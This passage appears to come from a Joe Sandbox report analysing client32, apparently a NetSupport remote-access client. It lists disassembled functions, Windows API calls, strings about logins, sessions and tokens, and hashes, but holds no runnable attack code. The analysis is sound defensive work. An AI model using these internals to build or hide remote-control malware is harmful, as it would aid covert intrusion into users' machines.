                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectSelect$InflateLineMoveRect$ErrorExitLastMessagePolygonProcessRelease__floor_pentium4wsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 4043586968-2830328467
                                                                              • Opcode ID: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                              • Instruction ID: 40ef36492cbbdd63dd1a1365ef49c9bea88dfca2d0282d7a726c9572eb38d0e4
                                                                              • Opcode Fuzzy Hash: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                              • Instruction Fuzzy Hash: 75E14BB4E00B09DBCB14DFA9D984ADEFBF8FF48308F104529D46AA7254DB31A965CB50
                                                                              Function 1103C0B0 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 1103C1EF
                                                                              • Sleep.KERNEL32(000001F4), ref: 1103C234
                                                                              • PostMessageA.USER32(00040270,00000010,00000000,00000000), ref: 1103C25F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountMessagePostSleepTick
                                                                              • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                              • API String ID: 507213284-4185502373
                                                                              • Opcode ID: 4c2ad38552c5ffc9990115ab26d0db913c6aa8545f47a3c48e54c0980591a59c
                                                                              • Instruction ID: bc5b4941b946bae8cf34de2d164fb10a7a3b346b9060a70c00e6ff89969772c9
                                                                              • Opcode Fuzzy Hash: 4c2ad38552c5ffc9990115ab26d0db913c6aa8545f47a3c48e54c0980591a59c
                                                                              • Instruction Fuzzy Hash: F9410938F413767FE661CAE39E81FA9F6949B82B0DF100066FA19FA1C5D760B8408795
                                                                              Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                              • _free.LIBCMT ref: 1112131D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 11121333
                                                                              • _free.LIBCMT ref: 11121348
                                                                              • GdiFlush.GDI32(?,?,?,01578E40), ref: 11121350
                                                                              • _free.LIBCMT ref: 1112135D
                                                                              • _free.LIBCMT ref: 11121371
                                                                              • SelectObject.GDI32(?,?), ref: 1112138D
                                                                              • DeleteObject.GDI32(?), ref: 1112139A
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,01578E40), ref: 111213A4
                                                                              • DeleteDC.GDI32(?), ref: 111213CB
                                                                              • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                              • DeleteDC.GDI32(?), ref: 111213EB
                                                                              • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                              Strings
                                                                              • Error deleting membm, e=%d, xrefs: 111213AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                              • String ID: Error deleting membm, e=%d
                                                                              • API String ID: 3195047866-709490903
                                                                              • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                              • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                              • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                              Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                              • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                              • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 4172769820-2231854162
                                                                              • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                              • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                              • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                              Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000017D,AB86ACF8,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                              • _memset.LIBCMT ref: 1110F4C2
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                              • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                              • _free.LIBCMT ref: 1110F628
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                              • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                              • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,AB86ACF8,0000017D,00000001), ref: 1110F681
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                              • String ID: End Record %s$PCIR
                                                                              • API String ID: 4278564793-2672865668
                                                                              • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                              • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                              Function 1103C2B0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103C396
                                                                              • _free.LIBCMT ref: 1103C490
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                              • _calloc.LIBCMT ref: 1103C4A5
                                                                              • _free.LIBCMT ref: 1103C4E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc_freewsprintf$CreateDialogErrorLastParam_malloc_memset
                                                                              • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                              • API String ID: 1372014042-1552251038
                                                                              • Opcode ID: 72b7735d7667b6ec302ef8ca0014c817d3edac096f2fed806ed12241bd93b09b
                                                                              • Instruction ID: cdac1be2d741978c3eef80f3bcdc0ac73d985042abc912fef0ab0d71eb78c2cc
                                                                              • Opcode Fuzzy Hash: 72b7735d7667b6ec302ef8ca0014c817d3edac096f2fed806ed12241bd93b09b
                                                                              • Instruction Fuzzy Hash: 77612475E41326AFEB10DFA4CDC1FADB3A4AB85709F10426AE6169B3C0EB716940C791
                                                                              Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000), ref: 110F711B
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • wsprintfA.USER32 ref: 110F7235
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                              • wsprintfA.USER32 ref: 110F7267
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                              • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 856016564-3838485836
                                                                              • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                              • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                              Function 110F2300 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsValidSid.ADVAPI32(?,?,?), ref: 110F230B
                                                                              • GetSidIdentifierAuthority.ADVAPI32(?,?), ref: 110F231C
                                                                              • GetSidSubAuthorityCount.ADVAPI32(?), ref: 110F2325
                                                                              • SetLastError.KERNEL32(0000007A), ref: 110F2346
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Authority$CountErrorIdentifierLastValid
                                                                              • String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
                                                                              • API String ID: 228009767-531523367
                                                                              • Opcode ID: 57a6488dd8bcfc92baea919205bc7f2fa72d0bc6c6c6a664b58e8be8880b9895
                                                                              • Instruction ID: 492306157e7ec18f2a05f9c3a54debd260959543ed90ab263cae37764b9c0b6d
                                                                              • Opcode Fuzzy Hash: 57a6488dd8bcfc92baea919205bc7f2fa72d0bc6c6c6a664b58e8be8880b9895
                                                                              • Instruction Fuzzy Hash: EA417EB19041659BC719CF7D8CA99EAFFF5EF86205708C5BAF4E687200F538D5088760
                                                                              Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                              • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                              • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                              • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                              • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                              • GetDC.USER32(?), ref: 11025085
                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                              • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                              • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                              • SelectObject.GDI32(?,?), ref: 110250C7
                                                                              • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SetCaretPos.USER32(?,?), ref: 11025111
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                              • String ID:
                                                                              • API String ID: 4100900918-3916222277
                                                                              • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                              • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                              • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                              Function 110F6150 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,00000002,00000000,?), ref: 110F618F
                                                                              • GetCurrentProcessId.KERNEL32 ref: 110F61D1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F6203
                                                                              • GetCurrentProcessId.KERNEL32 ref: 110F620C
                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
                                                                              • GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
                                                                              • CloseHandle.KERNEL32(11189C68), ref: 110F626A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110F6271
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F627B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
